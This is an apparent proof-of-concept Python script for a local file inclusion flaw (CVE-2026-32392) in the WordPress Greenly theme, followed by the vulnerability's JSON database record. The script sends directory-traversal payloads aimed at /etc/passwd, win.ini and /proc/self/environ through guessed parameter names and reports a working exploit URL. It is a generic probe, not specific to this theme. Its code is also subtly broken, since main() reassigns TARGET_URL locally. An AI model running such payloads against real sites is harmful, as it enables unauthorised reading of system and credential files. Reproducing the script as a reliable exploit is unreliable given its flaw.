CVE-2026-32392

# CVE-2026-32392 PoC - WordPress Greenly Theme Local File Inclusion # Target: WordPress site using Greenly theme <= 8.1 # Author: Security Researcher import requests import sys TARGET_URL = "http://target-site.com" # Common vulnerable parameter names in WordPress themes VULN_PARAMS = ["file", "page", "template", "theme", "style", "script"] # Files to test for LFI TEST_FILES = [ "../../../../../../etc/passwd", "../../../../../../windows/win.ini", "../../../../../../proc/self/environ" ] def test_lfi(url, param, filename): """Test for Local File Inclusion vulnerability""" full_url = f"{url}/?{param}={filename}" try: response = requests.get(full_url, timeout=10) # Check for file content signatures if "root:" in response.text or ":/bin/" in response.text: print(f"[+] VULNERABLE! Found /etc/passwd via parameter: {param}") print(f"[+] URL: {full_url}") return True elif "[extensions]" in response.text: print(f"[+] VULNERABLE! Found win.ini via parameter: {param}") return True elif "DOCUMENT_ROOT" in response.text or "HTTP_USER_AGENT" in response.text: print(f"[+] VULNERABLE! Found proc/self/environ via parameter: {param}") return True except Exception as e: print(f"[-] Error testing {full_url}: {e}") return False def main(): if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Testing CVE-2026-32392 - Greenly Theme LFI") print(f"[*] Target: {TARGET_URL}") for param in VULN_PARAMS: for test_file in TEST_FILES: if test_lfi(TARGET_URL, param, test_file): print(f"[!] Exploit: {TARGET_URL}/?{param}={test_file}") exit(0) print("[-] No LFI vulnerability detected with basic tests") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-32392", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:54.733", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Creatives_Planet Greenly greenly allows PHP Local File Inclusion.This issue affects Greenly: from n/a through <= 8.1."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en un programa PHP, vulnerabilidad ('inclusión remota de ficheros PHP') en Creatives_Planet Greenly greenly permite la inclusión local de ficheros PHP. Este problema afecta a Greenly: desde n/a hasta &lt;= 8.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/greenly/vulnerability/wordpress-greenly-theme-8-1-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}